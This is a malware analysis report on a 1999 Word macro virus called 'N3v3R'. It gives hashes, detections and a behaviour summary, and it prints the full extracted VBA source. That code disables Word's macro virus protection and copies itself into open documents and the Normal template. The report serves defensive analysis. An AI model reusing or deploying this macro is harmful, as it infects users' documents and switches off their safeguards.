Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d87eea9110f3c04f…

MALICIOUS

Office (OLE)

Size: 26.5 KB
Created: 1999-06-26 12:28:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 6fa65aa67ef6fdf06b217f66fc1865d2
SHA-1: a6cb09b0caf9f91dd875e52e2bdd32f1fde9e23b
SHA-256: d87eea9110f3c04ff9244942422605360f8dcf9489fc1b5cf1efad8d81897b45
Risk Score: 80

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a Microsoft Word document containing VBA macros. When the document is closed, the macro turns off Word's macro virus protection (Options.VirusProtection = False) and copies its own code into the active document and the Normal template whenever their first code module is empty, which is how it infects other documents. The script also contains logic to set a password on the document, but the trigger compares Day(Now) with the string "N3v3R", so this payload is not activated. The presence of these self-propagation and obfuscation techniques strongly suggests malicious intent.

Heuristics 2

  • ClamAV: Doc.Trojan.Ever-1 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Ever-1
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS)
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1409 bytes
SHA-256: 235dfbc3ab2b57a8feb645880b91ba85b89feca37a1802c48713df1cd7b58b8d
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' N3v3R v1.1 by SPo0Ky and Buddy Music of the group VX4U
' 23rd June 1999
' SR-1 Compatible MS-Word Class bug with 4 lines of code.
' Includes "the basic stuff", a small payload which
' would set a random password (though it never gets activated),
' and as a bonus it is even undetectable by F-Prot's and AVP's
' heuristics :-)

Private Sub Document_Close()
Options.VirusProtection = False ' the basic stuff you asked for :-)
If ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines = 0 Then ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines 1, ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100) ' infection and infection check of the activedocument
If NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines = 0 Then NormalTemplate.VBProject.VBComponents(1).CodeModule.InsertLines 1, ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100) ' infection and infection check of the normaltemplate
If Day(Now) = "N3v3R" Then ActiveDocument.Password = ActiveDocument.Words(1) ' a payload which would set a "random" password if the day is "N3v3R" (enough to prove my point, you know ;-)
End Sub